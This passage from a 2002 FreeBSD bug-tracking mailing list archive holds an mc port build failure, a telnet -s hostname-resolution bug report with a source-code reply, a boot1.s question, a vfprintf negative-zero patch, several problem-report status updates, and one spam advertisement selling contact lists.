/usr/local/bin/sed_inplace - found ===> mc-4.5.55_3 depends on shared library: slang.1 - found ===> mc-4.5.55_3 depends on shared library: iconv.3 - found ===> mc-4.5.55_3 depends on shared library: intl.4 - found ===> mc-4.5.55_3 depends on shared library: glib12.3 - found [...omit...] cc -L/usr/local/lib -lintl -L/usr/local/lib -o mc dir.o util.o screen.o dialog.o key.o keyxdef.o menu.o file.o win.o color.o help.o find.o profile.o user.o view.o ext.o mouse.o setup.o dlg.o option.o tree.o widget.o chmod.o mad.o wtools.o info.o cons.handler.o chown.o subshell.o terms.o boxes.o hotlist.o achown.o layout.o fsusage.o mountlist.o regex.o complete.o slint.o command.o cmd.o main.o panelize.o learn.o listmode.o utilunix.o background.o rxvt.o text.o popt.o findme.o poptparse.o poptconfig.o popthelp.o filegui.o filenot.o fileopctx.o treestore.o textconf.o charsets.o selcodepage.o -L../vfs -L../slang -L../edit -lslang -ltermcap -ledit -lvfs-mc -L/usr/local/lib -lglib12 -lcurses setup.o(.rodata+0x3b4): undefined reference to `option_word_wrap_line_length' setup.o(.rodata+0x3bc): undefined reference to `edit_key_emulation' setup.o(.rodata+0x3c4): undefined reference to `option_tab_spacing' setup.o(.rodata+0x3cc): undefined reference to `option_fill_tabs_with_spaces' setup.o(.rodata+0x3d4): undefined reference to `option_return_does_auto_indent' setup.o(.rodata+0x3dc): undefined reference to `option_backspace_through_tabs' setup.o(.rodata+0x3e4): undefined reference to `option_fake_half_tabs' setup.o(.rodata+0x3ec): undefined reference to `option_save_mode' setup.o(.rodata+0x3f4): undefined reference to `option_backup_ext_int' setup.o(.rodata+0x3fc): undefined reference to `option_auto_para_formatting' setup.o(.rodata+0x404): undefined reference to `option_typewriter_wrap' setup.o(.rodata+0x40c): undefined reference to `edit_confirm_save' setup.o(.rodata+0x414): undefined reference to `option_syntax_highlighting' layout.o: In function `change_screen_size': layout.o(.text+0x13e0): undefined reference to `edit_dlg' layout.o(.text+0x13eb): undefined reference to `edit_adjust_size' cmd.o: In function `do_edit_at_line': cmd.o(.text+0x53b): undefined reference to `edit' main.o: In function `mc_maybe_editor_or_viewer': main.o(.text+0x21ff): undefined reference to `edit' main.o(.data+0x4c4): undefined reference to `edit_user_menu_cmd' gmake[2]: *** [mc] Error 1 gmake[2]: Leaving directory `/usr/ports/misc/mc/work/mc-4.5.55/src' gmake[1]: *** [all-recursive] Error 1 gmake[1]: Leaving directory `/usr/ports/misc/mc/work/mc-4.5.55' gmake: *** [all] Error 2 *** Error code 2 Stop in /usr/ports/misc/mc. My ports' version: # $FreeBSD: ports/misc/mc/Makefile,v 1.71 2002/08/17 16:12:13 fjoe Exp $ And I had upgraded: ispell, libslang, libiconv, gettext to latest one... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 3:30: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BEE8237B400 for ; Wed, 21 Aug 2002 03:30:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1267543E65 for ; Wed, 21 Aug 2002 03:30:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7LAU1JU074462 for ; Wed, 21 Aug 2002 03:30:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7LAU1ZK074461; Wed, 21 Aug 2002 03:30:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A088B37B400 for ; Wed, 21 Aug 2002 03:26:51 -0700 (PDT) Received: from atlantis.atlantis.dp.ua (atlantis.atlantis.dp.ua [193.108.46.1]) by mx1.FreeBSD.org (Postfix) with ESMTP id 489D943E6E for ; Wed, 21 Aug 2002 03:26:49 -0700 (PDT) (envelope-from dmitry@atlantis.dp.ua) Received: from atlantis.atlantis.dp.ua (localhost [127.0.0.1]) by atlantis.atlantis.dp.ua (8.12.3/8.12.3) with ESMTP id g7LAQZtp027011 for ; Wed, 21 Aug 2002 13:26:36 +0300 (EEST) (envelope-from dmitry@atlantis.dp.ua) Received: (from dmitry@localhost) by atlantis.atlantis.dp.ua (8.12.3/8.12.3/Submit) id g7LAQXQl027002; Wed, 21 Aug 2002 13:26:33 +0300 (EEST) Message-Id: <200208211026.g7LAQXQl027002@atlantis.atlantis.dp.ua> Date: Wed, 21 Aug 2002 13:26:33 +0300 (EEST) From: Dmitry Pryanishnikov Reply-To: Dmitry Pryanishnikov To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/41841: telnet client can't resolve hostname in -s option Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41841 >Category: bin >Synopsis: telnet client can't resolve hostname in -s option >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Aug 21 03:30:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Dmitry Pryanishnikov >Release: FreeBSD 4.6-RELEASE-p1 i386 >Organization: Atlantis ISP >Environment: >Description: Telnet client can't resolve host name given with -s option: "telnet -s host" doesn't work while "telnet -s IP" works. >How-To-Repeat: dmitry@atlantis$ telnet localhost Trying 127.0.0.1... telnet: connect to address 127.0.0.1: Connection refused telnet: Unable to connect to remote host So "localhost" resolves OK... dmitry@atlantis$ telnet -s localhost localhost localhost: hostname nor servname provided, or not known ...except in -s option! dmitry@atlantis$ telnet -s 127.0.0.1 localhost Trying 127.0.0.1... telnet: connect to address 127.0.0.1: Connection refused telnet: Unable to connect to remote host -s IP still works. >Fix: Don't know. >Release-Note: >Audit-Trail: >Unformatted: >System: FreeBSD atlantis.atlantis.dp.ua 4.6-RELEASE-p1 FreeBSD 4.6-RELEASE-p1 #0: Sat Jul 6 17:31:08 EEST 2002 root@atlantis.dp.ua:/usr/src/sys/compile/ATLANTIS i386 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 4: 0:16 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3BFBD37B400 for ; Wed, 21 Aug 2002 04:00:08 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id D5FBF43E70 for ; Wed, 21 Aug 2002 04:00:07 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7LB07JU080192 for ; Wed, 21 Aug 2002 04:00:07 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7LB06Db080055; Wed, 21 Aug 2002 04:00:06 -0700 (PDT) Date: Wed, 21 Aug 2002 04:00:06 -0700 (PDT) Message-Id: <200208211100.g7LB06Db080055@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Maxim Maximov Subject: Re: bin/41841: telnet client can't resolve hostname in -s option Reply-To: Maxim Maximov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/41841; it has been noted by GNATS. From: Maxim Maximov To: FreeBSD-gnats-submit@FreeBSD.ORG Cc: Subject: Re: bin/41841: telnet client can't resolve hostname in -s option Date: Wed, 21 Aug 2002 14:54:07 +0400 From src/usr.bin/telnet/command.c: if (src_addr != NULL) { memset(&hints, 0, sizeof(hints)); hints.ai_flags = AI_NUMERICHOST; hints.ai_family = family; hints.ai_socktype = SOCK_STREAM; error = getaddrinfo(src_addr, 0, &hints, &src_res); note "hints.ai_flags = AI_NUMERICHOST". it states, that "a non-NULL nodename string must be a numeric host address string." (excerpt from getaddrinfo(3)) so either manpage lies, or one should remove this string from commands.c Dmitry Pryanishnikov wrote: >>Number: 41841 >>Category: bin >>Synopsis: telnet client can't resolve hostname in -s option >>Confidential: no >>Severity: serious >>Priority: medium >>Responsible: freebsd-bugs >>State: open >>Quarter: >>Keywords: >>Date-Required: >>Class: sw-bug >>Submitter-Id: current-users >>Arrival-Date: Wed Aug 21 03:30:01 PDT 2002 >>Closed-Date: >>Last-Modified: >>Originator: Dmitry Pryanishnikov >>Release: FreeBSD 4.6-RELEASE-p1 i386 >>Organization: > > Atlantis ISP > >>Environment: >>Description: > > Telnet client can't resolve host name given with -s option: > "telnet -s host" doesn't work while "telnet -s IP" works. > >>How-To-Repeat: > > > dmitry@atlantis$ telnet localhost > Trying 127.0.0.1... > telnet: connect to address 127.0.0.1: Connection refused > telnet: Unable to connect to remote host > > So "localhost" resolves OK... > > dmitry@atlantis$ telnet -s localhost localhost > localhost: hostname nor servname provided, or not known > > ...except in -s option! > > dmitry@atlantis$ telnet -s 127.0.0.1 localhost > Trying 127.0.0.1... > telnet: connect to address 127.0.0.1: Connection refused > telnet: Unable to connect to remote host > > -s IP still works. > >>Fix: > > Don't know. > >>Release-Note: >>Audit-Trail: >>Unformatted: > > >System: FreeBSD atlantis.atlantis.dp.ua 4.6-RELEASE-p1 FreeBSD 4.6-RELEASE-p1 #0: Sat Jul 6 17:31:08 EEST 2002 root@atlantis.dp.ua:/usr/src/sys/compile/ATLANTIS i386 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-bugs" in the body of the message -- Maxim Maximov System Administrator AGAVA Software (http://www.agava.com) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 4:17:45 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 841C237B400 for ; Wed, 21 Aug 2002 04:17:43 -0700 (PDT) Received: from mailout10.sul.t-online.com (mailout10.sul.t-online.com [194.25.134.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id D295843E70 for ; Wed, 21 Aug 2002 04:17:42 -0700 (PDT) (envelope-from corecode@corecode.ath.cx) Received: from fwd01.sul.t-online.de by mailout10.sul.t-online.com with smtp id 17hTUb-00084p-00; Wed, 21 Aug 2002 13:17:41 +0200 Received: from spirit.zuhause.stoert.net (320050403952-0001@[217.224.174.106]) by fmrl01.sul.t-online.com with esmtp id 17hTUH-18QieGC; Wed, 21 Aug 2002 13:17:21 +0200 Received: from terrorfish.uni.stoert.net (terrorfish.uni.stoert.net [10.150.180.178]) by spirit.zuhause.stoert.net (8.11.6/8.11.6) with ESMTP id g7LBHEk67642; Wed, 21 Aug 2002 13:17:14 +0200 (CEST) (envelope-from corecode@corecode.ath.cx) Received: from terrorfish.uni.stoert.net (localhost [127.0.0.1]) by terrorfish.uni.stoert.net (8.12.5/8.12.5) with ESMTP id g7LBGIFx000485; Wed, 21 Aug 2002 13:16:18 +0200 (CEST) (envelope-from corecode@terrorfish.uni.stoert.net) Received: (from corecode@localhost) by terrorfish.uni.stoert.net (8.12.5/8.12.5/Submit) id g7LBGIlo000484; Wed, 21 Aug 2002 13:16:18 +0200 (CEST) (envelope-from corecode) Date: Wed, 21 Aug 2002 13:16:13 +0200 From: "Simon 'corecode' Schubert" To: swp@uni-altai.ru Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: boot1.s Message-Id: <20020821131613.115c0553.corecode@corecode.ath.cx> In-Reply-To: <20020821113429.A37800@bspu.secna.ru> References: <20020821113429.A37800@bspu.secna.ru> X-Mailer: Sylpheed version 0.8.1claws (GTK+ 1.2.10; i386-portbld-freebsd5.0) Mime-Version: 1.0 Content-Type: multipart/signed; protocol="application/pgp-signature"; micalg=pgp-sha1; boundary="Zw+W3qW=.YGpHV0u" X-Sender: 320050403952-0001@t-dialin.net Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --Zw+W3qW=.YGpHV0u Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit On Wed, 21 Aug 2002 11:34:29 +0700 mitrohin a.s. wrote: > file /usr/src/sys/boot/i386/boot2/boot1.s, line 140 > > mov $part4,%si # Partition > what %dl have value? i don`t seen initialization for %dl/%dx. bug? no. that's set by the BIOS. > cmpb $0x80,%dl # Hard drive? > jb main.4 # No -- /"\ http://corecode.ath.cx/#donate \ / \ ASCII Ribbon Campaign / \ Against HTML Mail and News --Zw+W3qW=.YGpHV0u Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9Y3aBr5S+dk6z85oRAuSKAJ9Fc+UEQay7UnzvNmO5z9W9spvASwCgtok/ s2pm/aahxGIkwRMwYqSuLi0= =J/Qv -----END PGP SIGNATURE----- --Zw+W3qW=.YGpHV0u-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 4:22:24 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 684B437B405; Wed, 21 Aug 2002 04:22:20 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id D748E43E7B; Wed, 21 Aug 2002 04:22:19 -0700 (PDT) (envelope-from schweikh@FreeBSD.org) Received: from freefall.freebsd.org (schweikh@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7LBMJJU092655; Wed, 21 Aug 2002 04:22:19 -0700 (PDT) (envelope-from schweikh@freefall.freebsd.org) Received: (from schweikh@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7LBMJrt092651; Wed, 21 Aug 2002 04:22:19 -0700 (PDT) Date: Wed, 21 Aug 2002 04:22:19 -0700 (PDT) From: Jens Schweikhardt Message-Id: <200208211122.g7LBMJrt092651@freefall.freebsd.org> To: gotoken@notwork.org, schweikh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/41823: printf("%+f\n", -0.0) generates +0.000000 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: printf("%+f\n", -0.0) generates +0.000000 State-Changed-From-To: open->analyzed State-Changed-By: schweikh State-Changed-When: Wed Aug 21 04:10:56 PDT 2002 State-Changed-Why: You are correct, ISO9899:1999 states in footnote 233) "The results of all floating conversions of a negative zero, and of negative values that round to zero, include a minus sign." Can you try this patch against -current? (stable should be easy too). This is what you suggested, I believe, i.e. moving the __dtoa() before the comparison and using "if (dsgn)" instead of value<0. This would align us a little closer to NetBSD as you stated. Index: src/lib/libc/stdio/vfprintf.c =================================================================== RCS file: /home/ncvs/src/lib/libc/stdio/vfprintf.c,v retrieving revision 1.43 diff -u -r1.43 vfprintf.c --- src/lib/libc/stdio/vfprintf.c 15 Aug 2002 10:28:52 -0000 1.43 +++ src/lib/libc/stdio/vfprintf.c 21 Aug 2002 11:17:14 -0000 @@ -1409,13 +1409,13 @@ ndigits++; mode = 2; /* ndigits significant digits */ } - if (value < 0) { + digits = __dtoa(value, mode, ndigits, decpt, &dsgn, &rve, + dtoaresultp); + if (dsgn) { value = -value; *sign = '-'; } else *sign = '\000'; - digits = __dtoa(value, mode, ndigits, decpt, &dsgn, &rve, - dtoaresultp); if ((ch != 'g' && ch != 'G') || flags & ALT) { /* print trailing zeros */ bp = digits + ndigits; http://www.freebsd.org/cgi/query-pr.cgi?pr=41823 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 8:13:27 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B30D937B400; Wed, 21 Aug 2002 08:13:24 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6EEDD43E65; Wed, 21 Aug 2002 08:13:24 -0700 (PDT) (envelope-from schweikh@FreeBSD.org) Received: from freefall.freebsd.org (schweikh@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7LFDOJU060314; Wed, 21 Aug 2002 08:13:24 -0700 (PDT) (envelope-from schweikh@freefall.freebsd.org) Received: (from schweikh@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7LFDN3v060310; Wed, 21 Aug 2002 08:13:23 -0700 (PDT) Date: Wed, 21 Aug 2002 08:13:23 -0700 (PDT) From: Jens Schweikhardt Message-Id: <200208211513.g7LFDN3v060310@freefall.freebsd.org> To: alane@geeksrus.net, schweikh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/32760: Please MFC /usr/include/malloc.h to -STABLE. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Please MFC /usr/include/malloc.h to -STABLE. State-Changed-From-To: open->suspended State-Changed-By: schweikh State-Changed-When: Wed Aug 21 08:11:47 PDT 2002 State-Changed-Why: As Sheldon points out, this won't be MFCd on the 4-STABLE branch due to the reasons stated. Once 4-STABLE is no longer maintained, this PR can be closed. http://www.freebsd.org/cgi/query-pr.cgi?pr=32760 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 8:18:17 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4AC4837B400; Wed, 21 Aug 2002 08:18:16 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 07D6A43E86; Wed, 21 Aug 2002 08:18:16 -0700 (PDT) (envelope-from schweikh@FreeBSD.org) Received: from freefall.freebsd.org (schweikh@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7LFIFJU061843; Wed, 21 Aug 2002 08:18:15 -0700 (PDT) (envelope-from schweikh@freefall.freebsd.org) Received: (from schweikh@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7LFIFtm061839; Wed, 21 Aug 2002 08:18:15 -0700 (PDT) Date: Wed, 21 Aug 2002 08:18:15 -0700 (PDT) From: Jens Schweikhardt Message-Id: <200208211518.g7LFIFtm061839@freefall.freebsd.org> To: angelini@bmm.it, schweikh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/30373: Logitech IFeel Optical USB mouse does not attach Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Logitech IFeel Optical USB mouse does not attach State-Changed-From-To: open->feedback State-Changed-By: schweikh State-Changed-When: Wed Aug 21 08:17:50 PDT 2002 State-Changed-Why: Does this also happen with a recent -stable? http://www.freebsd.org/cgi/query-pr.cgi?pr=30373 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 8:40:27 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E0B2637B401 for ; Wed, 21 Aug 2002 08:40:12 -0700 (PDT) Received: from yahoo.com (lsanca1-ar4-255-099.biz.dsl.gtei.net [4.33.255.99]) by mx1.FreeBSD.org (Postfix) with SMTP id EFD5F43E6E for ; Wed, 21 Aug 2002 08:40:07 -0700 (PDT) (envelope-from MarketingProducts0820@yahoo.com) From: [[MarketingProducts]] To: Reply-To: Subject: Lists: Publicity - Libraries - Bookstores - Film Producers - Art Galleries - Record Stores - Custom (more) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Message-Id: <20020821154007.EFD5F43E6E@mx1.FreeBSD.org> Date: Wed, 21 Aug 2002 08:40:07 -0700 (PDT) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -------------------------------------------------------------- NEW LISTS: PBS STATIONS, UK MEDIA, POLITICAL MEDIA, NEW AGE MEDIA, UK LIBRARIES, SCIENTIFIC JOURNALS, FILM & TV PRODUCERS, ART PUBLISHERS, LITERARY AGENTS, MENS MEDIA. -------------------------------------------------------------- IF WE DO NOT HAVE THE LIST YOU NEED, WE WILL COMPILE A CUSTOM LIST ACCORDING TO YOUR SPECIFICATIONS . . . Lists take 5-7 business days. Custom orders accepted on first-come, first-served basis. -------------------------------------------------------------- Call to place your order or for more information. US & CANADA TOLL-FREE NUMBER: 888 330 4919 (24/7) If you would like more information via email, please write us at sendlistinfo@netscape.net - Thank you. -------------------------------------------------------------- LIBRARIES LISTS INCLUDE: Name, Address, phone, fax and email address (when available). AVAILABLE FORMATS: Excel Spreadsheet & Text Database 1,200 U.S. Public Libraries (Largest Headquarters) WITH EMAIL ADDRESSES - $109 1,200 U.S. Public Libraries (Largest Headquarters) - $89 1,000 U.S. University Libraries (Largest) WITH EMAIL ADDRESSES - $89 1,000 U.S. University Libraries (Largest) - $69 400+ Community College Libraries WITH EMAIL ADDRESSES - $59 400+ Community College Libraries - $49 1,093 U.S. K-12 Private School Libraries WITH EMAIL ADDRESSES - $109 1,093 U.S. K-12 Private School Libraries - $89 200 U.K. Public Libraries WITH EMAIL ADDRESSES - $49 200 U.K. Public Libraries - $39 250 U.K. University Libraries WITH EMAIL ADDRESSES - $49 250 U.K. University Libraries - $39 528 Australian Public Libraries WITH EMAIL ADDRESSES - $79 528 Australian Public Libraries - $69 279 Australian College & Univ. Libraries WITH EMAIL ADDRESSES - $49 279 Australian College & Univ. Libraries - $39 200 Canadian Libraries WITH EMAIL ADDRESSES - $49 200 Canadian Libraries - $39 100 New Zealand Libraries WITH EMAIL ADDRESSES - $39 100 New Zealand Libraries - $29 1,000 U.S. Medical Libraries - $79 313 U.S. Law Libraries - $49 193 U.S. Religious Libraries - $39 ---------------------------------------------- BOOKSTORES LIST INCLUDES: Name, Address, phone, fax and email address (when available). AVAILABLE FORMATS: Excel Spreadsheets & Text Databases 1,900+ Independent Bookstores WITH EMAIL ADDRESSES - $149 1,900+ Independent Bookstores - $129 1,900+ College Bookstores WITH EMAIL ADDRESSES - $149 1,900+ College Bookstores - $129 3,000+ Christian Bookstores WITH EMAIL ADDRESSES - $169 3,000+ Christian Bookstores - $149 2,200+ Chain Bookstores - $129 575+ Book Distributors & Chain HQs - WITH EMAIL ADDRESSES - $59 575+ Book Distributors & Chain HQs - $ 49 675 Canadian General Bookstores WITH EMAIL ADDRESSES - $69 675 Canadian General Bookstores - $59 175 Canadian University Bookstores - WITH EMAIL ADDRESSES - $39 175 Canadian University Bookstores - $29 300 New Age Bookstores - $49 125 African-American Bookstores - $29 You will be able to download your lists WITHIN MINUTES. ----------------------------------------------- MEDIA LISTS LISTS INCLUDE: Contact Name, Title/Position, Company, Address, Phone, Fax and Email Address (when available) AVAILABLE FORMATS: Excel Spreadsheet and Microsoft Word PBS Stations (800+ Contacts) - $99 Scientific Journals (500 Contacts) - $99 UK Media List (500 Contacts) - $99 Political Media List (1,100+ Contacts) - $149 Canadian National Media (590+ Contacts) - $99 New Age Media (250+ Contacts) - $99 Mens Interest Media (400 Contacts) - $99 Womens Interest Media (1,350+ Contacts) - $149 Teen Interest Media (216 Contacts) - $99 Eclectic Newsweeklies (575+ Contacts) - $99 College Radio Stations (520+ Contacts) - $99 Local TV News (North Region) (840+ Contacts) - $99 Local TV News (Midwest Region) (870+ Contacts) - $99 Local TV News (West Region) (890+ Contacts) - $99 Local TV News (South Region) (1,100+ Contacts) - $129 Local TV News (All Regions) (3,700+ Contacts) - $249 Drive Time Radio - Top 50 Markets (300+ Contacts) - $69 Australian National Media List (360+ Contacts) - $99 Drive Time Radio - Top 100 Markets (600 Contacts) - $99 Newspapers - Top 100 Papers (1,100+ Contacts) - $99 National Media List (1000+ Contacts) - $99 Sex & Relationships Media List (402 Contacts) - $99 Music Industry Media List (1,142 Contacts) - $149 Fashion & Beauty List (1,400 Contacts) - $149 Motion Picture, Film & Video (695 Contacts) - $99 National Public Radio (265 Contacts) - $99 Sports Media List (427 Contacts) - $99 African American Media List (1500 Contacts) - $149 Environmental Media List (763 Contacts) - $99 Gay and Lesbian Media List (260 Contacts) - $99 Book Industry Media List (502 Contacts) - $99 Christian Media List (370 Contacts) - $99 Family & Parenting Media List (789 Contacts) - $99 College Newspaper Contacts (1,400+ Contacts) - $99 ------------------------------------------------- TV & FILM PRODUCERS, DIRECTORS, DEVELOPMENT EXECS, (MORE) 3,000+ Contacts - $299 (Entire List) 800+ Producers Only - $99 650+ Development, Creative & Acquisitions Contacts Only - $89 Lists Include: Contact Name, Title, Company, Address, Phone and Fax Number Available Formats: Excel Spreadsheet and Text Database PUBLISHING COMPANY CONTACTS 1,700+ U.S. Publishing Contacts - $149 300 Art Publishing Contacts - $49 List Includes: Contact Name, Title, Company, Address, Phone, Number, Fax Number and Email Address (when available) Available Formats: Excel Spreadsheet and Text Database LITERARY AGENTS 300+ Contacts - $59 List Includes: Contact Name, Title, Company, Address, Phone, Number, Fax Number and Email Address (when available) Available Formats: Excel Spreadsheet and Text Database MUSIC AGENTS/MANAGERS 150+ Contacts - $39 List Includes: Contact Name, Title, Company, Address, Phone, Fax Number and Email Address (when available) Available Formats: Excel Spreadsheet and Text Database Lists Include: Store Name, Address and Phone Number Available Formats: Excel Spreadsheet and Text Database MUSIC STORE LISTS 997 Independent Music Stores (Midwest) - $79 1215 Independent Music Stores (South) - $89 1444 Independent Music Stores (East) - $89 1355 Independent Music Stores (West) - $89 5008 Independent Music Stores (National)- $249 Lists Include: Store Name, Address and Phone Number Available Formats: Excel Spreadsheet and Text Database ART GALLERY LISTS US National List WITH EMAIL ADDRESSES: $169 (1090 Galleries) US National List: $149 (1090 Galleries) Southern US: $39 (140 Galleries) Central US: $39 (150 Galleries) Western US: $69 (272 Galleries) Eastern US: $89 (530 Galleries) United Kingdom: $69 (230 Galleries) Canada: $49 (165 Galleries) Australia: $29 (50 Galleries) Lists Include: Gallery Name, Address, Phone Number and Fax Number Available Formats: Excel Spreadsheet and Text Database OUR GUARANTEE: We will gladly refund postage (up to 34 cents per item) for any undeliverable addresses over 5% of the total list. We will also correct the undeliverable contacts and issue you an updated list. ------------------------ You will be able to download your lists WITHIN MINUTES. Call to place your order or for more information. US & CANADA TOLL-FREE NUMBER: 888 330 4919 (24/7) If you would like more information via email, please write us at sendlistinfo@netscape.net - Thank you. ------------------------------------------------------------------- To be removed from any future mailings, please send a message with your email address in the subject line to PublicityRemoval@netscape.net. Requests will be processed within 48 hours at that address only. Apologies for any inconvience. Thank you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 10:10: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 25C1637B400 for ; Wed, 21 Aug 2002 10:10:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 870D543E42 for ; Wed, 21 Aug 2002 10:10:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7LHA2JU092766 for ; Wed, 21 Aug 2002 10:10:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7LHA24i092765; Wed, 21 Aug 2002 10:10:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C362837B400 for ; Wed, 21 Aug 2002 10:01:32 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1EE6C43E42 for ; Wed, 21 Aug 2002 10:01:32 -0700 (PDT) (envelope-from 